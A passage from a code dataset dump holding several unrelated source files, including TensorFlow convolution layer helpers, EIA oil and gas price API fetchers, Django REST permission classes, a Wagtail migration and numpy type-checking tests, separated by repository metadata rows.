current_layer = activation_fn(current_layer)
return current_layer
def conv1(inputs,
nfilters,
ksize,
stride=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
current_layer = tf.nn.conv1d(inputs, weights, stride, padding=padding)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def atrous_conv1d(inputs,
nfilters,
ksize,
rate=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
""" Use tf.nn.atrous_conv2d and adapt to 1d"""
with tf.variable_scope(scope, reuse=reuse):
# from (bs,width,c) to (bs,width,1,c)
inputs = tf.expand_dims(inputs,2)
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, 1, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
current_layer = tf.nn.atrous_conv2d(inputs,weights, rate, padding=padding)
# Resize into (bs,width,c)
current_layer = tf.squeeze(current_layer,squeeze_dims=[2])
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def conv3(inputs,
nfilters,
ksize,
stride=1,
padding='SAME',
use_bias=True,
activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None,
scope=None,
reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[ksize, ksize, ksize, n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
collections=[tf.GraphKeys.WEIGHTS, tf.GraphKeys.VARIABLES],
regularizer=regularizer)
strides = [1, stride, stride, stride, 1]
current_layer = tf.nn.conv3d(inputs, weights, strides, padding=padding)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0.0),
collections=[tf.GraphKeys.BIASES, tf.GraphKeys.VARIABLES])
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def fc(inputs, nfilters, use_bias=True, activation_fn=tf.nn.relu,
initializer=tf.contrib.layers.variance_scaling_initializer(),
regularizer=None, scope=None, reuse=None):
with tf.variable_scope(scope, reuse=reuse):
n_in = inputs.get_shape().as_list()[-1]
weights = tf.get_variable(
'weights',
shape=[n_in, nfilters],
dtype=inputs.dtype.base_dtype,
initializer=initializer,
regularizer=regularizer)
current_layer = tf.matmul(inputs, weights)
if use_bias:
biases = tf.get_variable(
'biases',
shape=[nfilters,],
dtype=inputs.dtype.base_dtype,
initializer=tf.constant_initializer(0))
current_layer = tf.nn.bias_add(current_layer, biases)
if activation_fn is not None:
current_layer = activation_fn(current_layer)
return current_layer
def batch_norm(inputs, center=False, scale=False,
decay=0.999, epsilon=0.001, reuse=None,
scope=None, is_training=False):
return tf.contrib.layers.batch_norm(
inputs, center=center, scale=scale,
decay=decay, epsilon=epsilon, activation_fn=None,
reuse=reuse,trainable=False, scope=scope, is_training=is_training)
relu = tf.nn.relu
def crop_like(inputs, like, name=None):
with tf.name_scope(name):
_, h, w, _ = inputs.get_shape().as_list()
_, new_h, new_w, _ = like.get_shape().as_list()
crop_h = (h - new_h) // 2  # integer offsets; plain / would yield float indices on Python 3
crop_w = (w - new_w) // 2
cropped = inputs[:, crop_h:crop_h+new_h, crop_w:crop_w+new_w, :]
return cropped
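# Hypothetical usage sketch (TensorFlow 1.x API assumed, matching the tf.contrib calls
# above; tensor names and shapes are illustrative only):
#   x = tf.placeholder(tf.float32, [None, 64, 64, 3])
#   net = conv(x, nfilters=32, ksize=3, stride=2, scope='conv1')
#   net = batch_norm(net, scope='bn1', is_training=True)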
| 31.497992
| 96
| 0.648604
| 972
| 7,843
| 5.04321
| 0.100823
| 0.093023
| 0.037128
| 0.058752
| 0.834965
| 0.809466
| 0.809466
| 0.79437
| 0.79437
| 0.79437
| 0
| 0.008693
| 0.237282
| 7,843
| 248
| 97
| 31.625
| 0.810766
| 0.012878
| 0
| 0.797101
| 0
| 0
| 0.012671
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038647
| false
| 0
| 0.009662
| 0.004831
| 0.086957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
682a9211740ca279ca736263e93bb35ab681ebde
| 160
|
py
|
Python
|
bindings/pydeck/tests/bindings/test_string.py
|
StijnAmeloot/deck.gl
|
d67688e3f71a37e2f021dde6681bb1516bebac2b
|
[
"MIT"
] | 7,702
|
2016-04-19T15:56:09.000Z
|
2020-04-14T19:03:13.000Z
|
bindings/pydeck/tests/bindings/test_string.py
|
StijnAmeloot/deck.gl
|
d67688e3f71a37e2f021dde6681bb1516bebac2b
|
[
"MIT"
] | 3,126
|
2016-04-20T23:04:42.000Z
|
2020-04-14T22:46:02.000Z
|
bindings/pydeck/tests/bindings/test_string.py
|
StijnAmeloot/deck.gl
|
d67688e3f71a37e2f021dde6681bb1516bebac2b
|
[
"MIT"
] | 1,526
|
2016-05-07T06:55:07.000Z
|
2020-04-14T18:52:19.000Z
|
from pydeck.types import String


def test_basic_case():
    assert "ok" == String("ok")


def test_quotes():
    assert "`ok`" == String("ok", quote_type="`")
| 16
| 49
| 0.63125
| 22
| 160
| 4.409091
| 0.636364
| 0.14433
| 0.28866
| 0.329897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.18125
| 160
| 9
| 50
| 17.777778
| 0.740458
| 0
| 0
| 0
| 0
| 0
| 0.06875
| 0
| 0
| 0
| 0
| 0
| 0.4
| 1
| 0.4
| true
| 0
| 0.2
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
6832dbb97483a8501a3853a6b59861e16112abba
| 1,360
|
py
|
Python
|
pytroleum/eia.py
|
WaltXon/pytroleum
|
c8b1f53d2d276ebb6bc04834dd4e3f7989421535
|
[
"MIT"
] | 12
|
2019-05-10T16:37:22.000Z
|
2022-01-30T02:02:14.000Z
|
pytroleum/eia.py
|
WaltXon/pytroleum
|
c8b1f53d2d276ebb6bc04834dd4e3f7989421535
|
[
"MIT"
] | null | null | null |
pytroleum/eia.py
|
WaltXon/pytroleum
|
c8b1f53d2d276ebb6bc04834dd4e3f7989421535
|
[
"MIT"
] | 2
|
2020-01-17T08:53:34.000Z
|
2021-02-17T03:51:48.000Z
|
import requests
import pprint

# Note: set this before import, or pass `data=` explicitly to the functions
# below -- their default dicts bind the value of `api_key` at definition time.
api_key = ""


def get_eia_wti_monthly(
    addr=r"http://api.eia.gov/series/",
    data={"api_key": api_key, "series_id": "PET.RWTC.M"},
):
    # Fetch the series, print its metadata, and return the raw data points.
    r = requests.get(addr, params=data)
    rdict = r.json()["series"][0]
    data = rdict["data"]
    del rdict["data"]
    pp = pprint.PrettyPrinter(indent=4)
    pp.pprint(rdict)
    return data


def get_eia_wti_annual(
    addr=r"http://api.eia.gov/series/",
    data={"api_key": api_key, "series_id": "PET.RWTC.A"},
):
    r = requests.get(addr, params=data)
    rdict = r.json()["series"][0]
    data = rdict["data"]
    del rdict["data"]
    pp = pprint.PrettyPrinter(indent=4)
    pp.pprint(rdict)
    return data


def get_eia_henryhub_monthly(
    addr=r"http://api.eia.gov/series/",
    data={"api_key": api_key, "series_id": "NG.RNGWHHD.M"},
):
    r = requests.get(addr, params=data)
    rdict = r.json()["series"][0]
    data = rdict["data"]
    del rdict["data"]
    pp = pprint.PrettyPrinter(indent=4)
    pp.pprint(rdict)
    return data


def get_eia_henryhub_annual(
    addr=r"http://api.eia.gov/series/",
    data={"api_key": api_key, "series_id": "NG.RNGWHHD.A"},
):
    r = requests.get(addr, params=data)
    rdict = r.json()["series"][0]
    data = rdict["data"]
    del rdict["data"]
    pp = pprint.PrettyPrinter(indent=4)
    pp.pprint(rdict)
    return data
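

# --- Illustrative usage sketch (not part of the original file) ---
# Because the default `data` dicts capture `api_key` at definition time,
# setting the key later has no effect on them; pass the query parameters
# explicitly instead. The key below is a hypothetical placeholder.
if __name__ == "__main__":
    params = {"api_key": "YOUR_EIA_API_KEY", "series_id": "PET.RWTC.M"}
    wti = get_eia_wti_monthly(data=params)
    print(wti[:3])  # three most recent [period, value] pairs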
| 23.859649
| 59
| 0.621324
| 202
| 1,360
| 4.059406
| 0.173267
| 0.065854
| 0.043902
| 0.058537
| 0.942683
| 0.942683
| 0.942683
| 0.942683
| 0.942683
| 0.942683
| 0
| 0.007299
| 0.194118
| 1,360
| 56
| 60
| 24.285714
| 0.740876
| 0
| 0
| 0.765957
| 0
| 0
| 0.197059
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085106
| false
| 0
| 0.042553
| 0
| 0.212766
| 0.191489
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6834b31c00919653038fcba1137dbd610987f7d3
| 835
|
py
|
Python
|
api/permissions.py
|
Rybakov-Ilay/yamdb_final
|
9ab43ef36d626a255b9f83fff8d4a972f920b859
|
[
"MIT"
] | null | null | null |
api/permissions.py
|
Rybakov-Ilay/yamdb_final
|
9ab43ef36d626a255b9f83fff8d4a972f920b859
|
[
"MIT"
] | null | null | null |
api/permissions.py
|
Rybakov-Ilay/yamdb_final
|
9ab43ef36d626a255b9f83fff8d4a972f920b859
|
[
"MIT"
] | null | null | null |
from rest_framework import permissions
from rest_framework.permissions import SAFE_METHODS


class ReadOnly(permissions.BasePermission):
    def has_permission(self, request, view):
        return request.method in SAFE_METHODS

    def has_object_permission(self, request, view, obj):
        return request.method in SAFE_METHODS


class IsModerator(permissions.BasePermission):
    def has_permission(self, request, view):
        return request.user.is_authenticated and request.user.is_moderator

    def has_object_permission(self, request, view, obj):
        return request.user.is_moderator


class IsOwner(permissions.BasePermission):
    def has_permission(self, request, view):
        return request.user.is_authenticated

    def has_object_permission(self, request, view, obj):
        return request.user == obj.author
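

# --- Illustrative usage sketch (not part of the original file) ---
# A hypothetical viewset combining the permission classes above. DRF >= 3.9
# supports composing permissions with `|`: reads stay open, writes require
# the owner or a moderator.
from rest_framework import viewsets


class ExampleViewSet(viewsets.ViewSet):
    permission_classes = [ReadOnly | IsOwner | IsModerator]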
| 30.925926
| 74
| 0.758084
| 103
| 835
| 5.970874
| 0.281553
| 0.058537
| 0.204878
| 0.243902
| 0.731707
| 0.731707
| 0.669919
| 0.669919
| 0.669919
| 0.669919
| 0
| 0
| 0.17006
| 835
| 26
| 75
| 32.115385
| 0.887446
| 0
| 0
| 0.470588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.352941
| false
| 0
| 0.117647
| 0.352941
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
6882e51100c631b3587d7052da5ea91c939347b3
| 4,758
|
py
|
Python
|
biserici_inlemnite/app/migrations/0047_pozefundatie_pozestructuracatei_pozestructuracheotoare_pozestructuramixt_pozetiranti.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
biserici_inlemnite/app/migrations/0047_pozefundatie_pozestructuracatei_pozestructuracheotoare_pozestructuramixt_pozetiranti.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
biserici_inlemnite/app/migrations/0047_pozefundatie_pozestructuracatei_pozestructuracheotoare_pozestructuramixt_pozetiranti.py
|
ck-tm/biserici-inlemnite
|
c9d12127b92f25d3ab2fcc7b4c386419fe308a4e
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.13 on 2021-09-27 11:35

from django.db import migrations, models
import django.db.models.deletion
import modelcluster.fields
import wagtail.core.fields


class Migration(migrations.Migration):

    dependencies = [
        ('wagtailimages', '0023_add_choose_permissions'),
        ('app', '0046_auto_20210927_1427'),
    ]

    operations = [
        migrations.CreateModel(
            name='PozeTiranti',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_tiranti', to='app.descrierepage')),
                ('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PozeStructuraMixt',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_structura_mixt', to='app.descrierepage')),
                ('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PozeStructuraCheotoare',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_structura_cheotoare', to='app.descrierepage')),
                ('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PozeStructuraCatei',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_structura_catei', to='app.descrierepage')),
                ('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
        migrations.CreateModel(
            name='PozeFundatie',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sort_order', models.IntegerField(blank=True, editable=False, null=True)),
                ('observatii', wagtail.core.fields.RichTextField(blank=True, null=True, verbose_name='Observații')),
                ('page', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='poze_fundatie', to='app.descrierepage')),
                ('poza', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.image')),
            ],
            options={
                'ordering': ['sort_order'],
                'abstract': False,
            },
        ),
    ]
| 54.068182
| 168
| 0.606978
| 474
| 4,758
| 5.947257
| 0.172996
| 0.047889
| 0.054629
| 0.085846
| 0.85917
| 0.85917
| 0.85917
| 0.85917
| 0.85917
| 0.85917
| 0
| 0.010061
| 0.248003
| 4,758
| 87
| 169
| 54.689655
| 0.777809
| 0.009668
| 0
| 0.679012
| 1
| 0
| 0.161147
| 0.020382
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.049383
| 0
| 0.08642
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6883532f2502f82dccd35fe030c5e8e82af300c0
| 6,378
|
py
|
Python
|
numpy/typing/tests/data/reveal/bitwise_ops.py
|
mbkumar/numpy
|
0645461254a2110438b6df63ef193c1138c306ec
|
[
"BSD-3-Clause"
] | 3
|
2021-02-06T06:47:30.000Z
|
2021-08-11T10:05:27.000Z
|
numpy/typing/tests/data/reveal/bitwise_ops.py
|
RuSHi2381/numpy
|
5da4a8e1835a11d5a03b715e9c0afe3bb96c883b
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/typing/tests/data/reveal/bitwise_ops.py
|
RuSHi2381/numpy
|
5da4a8e1835a11d5a03b715e9c0afe3bb96c883b
|
[
"BSD-3-Clause"
] | null | null | null |
import numpy as np
i8 = np.int64(1)
u8 = np.uint64(1)
i4 = np.int32(1)
u4 = np.uint32(1)
b_ = np.bool_(1)
b = bool(1)
i = int(1)
AR = np.array([0, 1, 2], dtype=np.int32)
AR.setflags(write=False)
reveal_type(i8 << i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 >> i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 | i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 ^ i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 & i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 << AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(i8 >> AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(i8 | AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(i8 ^ AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(i8 & AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(i4 << i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 >> i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 | i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 ^ i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i4 & i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(i8 << i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 >> i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 | i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 ^ i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 & i4) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 << i) # E: numpy.signedinteger[Any]
reveal_type(i8 >> i) # E: numpy.signedinteger[Any]
reveal_type(i8 | i) # E: numpy.signedinteger[Any]
reveal_type(i8 ^ i) # E: numpy.signedinteger[Any]
reveal_type(i8 & i) # E: numpy.signedinteger[Any]
reveal_type(i8 << b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 >> b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 | b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 ^ b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 & b_) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 << b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 >> b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 | b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 ^ b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(i8 & b) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(u8 << u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 >> u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 | u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 ^ u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 & u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 << AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(u8 >> AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(u8 | AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(u8 ^ AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(u8 & AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(u4 << u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 >> u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 | u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 ^ u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 & u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(u4 << i4) # E: numpy.signedinteger[Any]
reveal_type(u4 >> i4) # E: numpy.signedinteger[Any]
reveal_type(u4 | i4) # E: numpy.signedinteger[Any]
reveal_type(u4 ^ i4) # E: numpy.signedinteger[Any]
reveal_type(u4 & i4) # E: numpy.signedinteger[Any]
reveal_type(u4 << i) # E: numpy.signedinteger[Any]
reveal_type(u4 >> i) # E: numpy.signedinteger[Any]
reveal_type(u4 | i) # E: numpy.signedinteger[Any]
reveal_type(u4 ^ i) # E: numpy.signedinteger[Any]
reveal_type(u4 & i) # E: numpy.signedinteger[Any]
reveal_type(u8 << b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 >> b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 | b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 ^ b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 & b_) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 << b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 >> b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 | b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 ^ b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(u8 & b) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(b_ << b_) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ >> b_) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ | b_) # E: numpy.bool_
reveal_type(b_ ^ b_) # E: numpy.bool_
reveal_type(b_ & b_) # E: numpy.bool_
reveal_type(b_ << AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(b_ >> AR) # E: Union[numpy.ndarray, numpy.integer[Any]]
reveal_type(b_ | AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(b_ ^ AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(b_ & AR) # E: Union[numpy.ndarray, numpy.integer[Any], numpy.bool_]
reveal_type(b_ << b) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ >> b) # E: numpy.signedinteger[numpy.typing._8Bit]
reveal_type(b_ | b) # E: numpy.bool_
reveal_type(b_ ^ b) # E: numpy.bool_
reveal_type(b_ & b) # E: numpy.bool_
reveal_type(b_ << i) # E: numpy.signedinteger[Any]
reveal_type(b_ >> i) # E: numpy.signedinteger[Any]
reveal_type(b_ | i) # E: numpy.signedinteger[Any]
reveal_type(b_ ^ i) # E: numpy.signedinteger[Any]
reveal_type(b_ & i) # E: numpy.signedinteger[Any]
reveal_type(~i8) # E: numpy.signedinteger[numpy.typing._64Bit]
reveal_type(~i4) # E: numpy.signedinteger[numpy.typing._32Bit]
reveal_type(~u8) # E: numpy.unsignedinteger[numpy.typing._64Bit]
reveal_type(~u4) # E: numpy.unsignedinteger[numpy.typing._32Bit]
reveal_type(~b_) # E: numpy.bool_
reveal_type(~AR) # E: Union[numpy.ndarray*, numpy.integer[Any], numpy.bool_]
| 48.318182
| 80
| 0.723267
| 972
| 6,378
| 4.536008
| 0.039095
| 0.217736
| 0.219778
| 0.184622
| 0.972783
| 0.972783
| 0.96802
| 0.96802
| 0.96802
| 0.924473
| 0
| 0.040816
| 0.116494
| 6,378
| 131
| 81
| 48.687023
| 0.741615
| 0.60693
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.009434
| 0
| 0.009434
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
d7cd5b7630f21eeec396dd9a8f6481d512fe4a0b
| 170
|
py
|
Python
|
treestream/backends/redis_lua/__init__.py
|
GambitResearch/treestream
|
5d08162fb095c4e34e7a80f2015946bb65b8021c
|
[
"MIT"
] | null | null | null |
treestream/backends/redis_lua/__init__.py
|
GambitResearch/treestream
|
5d08162fb095c4e34e7a80f2015946bb65b8021c
|
[
"MIT"
] | null | null | null |
treestream/backends/redis_lua/__init__.py
|
GambitResearch/treestream
|
5d08162fb095c4e34e7a80f2015946bb65b8021c
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from treestream.backends.redis_lua.writer import RedisTreeWriter
from treestream.backends.redis_lua.reader import RedisTreeReader
| 34
| 64
| 0.888235
| 21
| 170
| 6.857143
| 0.571429
| 0.194444
| 0.305556
| 0.375
| 0.416667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.076471
| 170
| 4
| 65
| 42.5
| 0.917197
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d7df6482015db9d1d6befb5e53db80fc1ee99994
| 49
|
py
|
Python
|
tests/test_app.py
|
sqrl-planner/sqrl-server
|
815b0b9ff8943faa806876aa9946ccc8314585ce
|
[
"MIT"
] | null | null | null |
tests/test_app.py
|
sqrl-planner/sqrl-server
|
815b0b9ff8943faa806876aa9946ccc8314585ce
|
[
"MIT"
] | null | null | null |
tests/test_app.py
|
sqrl-planner/sqrl-server
|
815b0b9ff8943faa806876aa9946ccc8314585ce
|
[
"MIT"
] | null | null | null |
import pytest


def test_true():
    assert True
| 8.166667
| 16
| 0.693878
| 7
| 49
| 4.714286
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.244898
| 49
| 5
| 17
| 9.8
| 0.891892
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0bc7c8d9ffa261e332bed2889d39e370b8fd409d
| 146
|
py
|
